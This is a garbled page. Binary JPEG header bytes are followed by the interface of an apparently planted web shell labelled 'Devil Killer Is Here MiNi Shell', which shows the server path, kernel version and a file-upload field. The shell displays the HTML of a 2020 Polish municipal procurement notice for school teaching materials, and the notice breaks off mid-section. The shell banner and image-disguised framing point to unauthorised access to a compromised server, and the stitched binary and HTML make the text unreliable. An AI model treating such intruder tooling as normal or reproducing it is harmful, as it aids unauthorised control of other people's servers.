JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20201019/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20201019/599329-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 599329-N-2020 z dnia 2020-10-19 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Świerklaniec</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Zakup materiałów pomocniczych do zajęć w ramach projektu "Doskonalenie kompetencji kluczowych uczniów w Gminie Świerklaniec" </span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">Doskonalenie kompetencji kluczowych uczniów w Gminie Świerklaniec</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Świerklaniec</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">54000900000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Młyńska</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">3</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">42-622</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Świerklaniec</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">śląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">322 844 853, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">lukasz.nolewajka@ugswierklaniec.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">322 844 852</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.bip.swierklaniec.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.bip.swierklaniec.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.swierklaniec.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">pisemnie</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Gminy Świerklaniec, ul. Młyńska 3, 42-622 Świerklaniec</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Zakup materiałów pomocniczych do zajęć w ramach projektu "Doskonalenie kompetencji kluczowych uczniów w Gminie Świerklaniec" </span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">IZ.271.2.19.2020</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci">-</span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">wszystkie</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu"> 1. Przedmiotem zamówienia jest dostawa do placówek oświatowych materiałów pomocniczych do zajęć w ramach projektu "Doskonalenie kompetencji kluczowych uczniów w Gminie Świerklaniec", zgodnie z opisem przedmiotu zamówienia zawartym w załączniku nr 1 do SIWZ. Załącznik nr 1 stanowi podstawę do wyceny. Wykonawca zobowiązany jest uwzględnić wszystkie pozycje w nim ujęte. 2. Wszystkie elementy przedmiotu zamówienia muszą być oryginalne, fabrycznie nowe, w oryginalnym opakowaniu, dostarczone bezpośrednio od producenta lub autoryzowanego dystrybutora, sprawne, wolne od jakichkolwiek wad fizycznych, jak również od jakichkolwiek wad prawnych i roszczeń osób trzecich. 3. Przed podpisaniem umowy wykonawca dostarczy szczegółowy cennik zawierający ceny jednostkowe sporządzony zgodnie z załącznikiem nr 1 do SIWZ. 4. Jeżeli w SIWZ lub pozostałej dokumentacji został wskazany znak towarowy, marka, producent, dostawca, patent, pochodzenie, źródło lub szczególny proces charakteryzujący produkty lub usługi dostarczone przez konkretnego wykonawcę albo nastąpiło wskazanie norm, europejskich ocen technicznych, wspólnych specyfikacji technicznych lub innych odniesień, bądź też elementy zamówienia zostały opisane w jakikolwiek sposób wskazujący na konkretny produkt, producenta lub pochodzenie – w tych przypadkach zamawiający dopuszcza zaoferowanie produktów i rozwiązań równoważnych w stosunku do wskazanych w dokumentacji - pod warunkiem, że posiadają one parametry i cechy nie gorsze od założonych przez zamawiającego oraz są zgodne z jego wymaganiami, szczególnie pod względem: 1) gabarytów i konstrukcji (wielkość, rodzaj, właściwości fizyczne, liczba elementów składowych), 2) charakteru użytkowego (tożsamość funkcji), 3) charakterystyki materiałowej (rodzaj i jakość materiałów), 4) parametrów technicznych (wytrzymałość, trwałość, konstrukcja), 5) parametrów bezpieczeństwa użytkowania.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">39162000-5</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39162100-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39162110-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>37524100-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>22111000-1</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach">14</span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'>14</TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">--</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">--</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">- Zdolność techniczna lub zawodowa – dot. części I zamówienia (ZSP w Orzechu):Zamawiający uzna warunek zdolności technicznej lub zawodowej za spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert wykonał, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, co najmniej 2 dostawy obejmujące pomoce dydaktyczne lub naukowe – każda dostawa o wartości min. 20.000 zł brutto. Zamawiający nie dopuszcza tzw. sumowania doświadczenia - łączenia wykonanych dostaw o mniejszej wartości w celu wykazania spełniania warunku.- Zdolność techniczna lub zawodowa – dot. części II zamówienia (SP w Nakle Śl.):Zamawiający uzna warunek zdolności technicznej lub zawodowej za spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert wykonał, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, co najmniej 2 dostawy obejmujące pomoce dydaktyczne lub naukowe – każda dostawa o wartości min. 3.000 zł brutto. Zamawiający nie dopuszcza tzw. sumowania doświadczenia - łączenia wykonanych dostaw o mniejszej wartości w celu wykazania spełniania warunku.- Zdolność techniczna lub zawodowa – dot. części III zamówienia (SP w Świerklańcu):Zamawiający uzna warunek zdolności technicznej lub zawodowej za spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert wykonał, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, co najmniej 2 dostawy obejmujące pomoce dydaktyczne lub naukowe – każda dostawa o wartości min. 70.000 zł brutto. Zamawiający nie dopuszcza tzw. sumowania doświadczenia - łączenia wykonanych dostaw o mniejszej wartości w celu wykazania spełniania warunku.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Wykonawca, którego oferta zostanie oceniona jako najkorzystniejsza, w celu wykazania braku podstaw wykluczenia z postępowania o udzielenie zamówienia zostanie wezwany do złożenia (aktualnego na dzień złożenia oświadczeń lub dokumentów) odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> 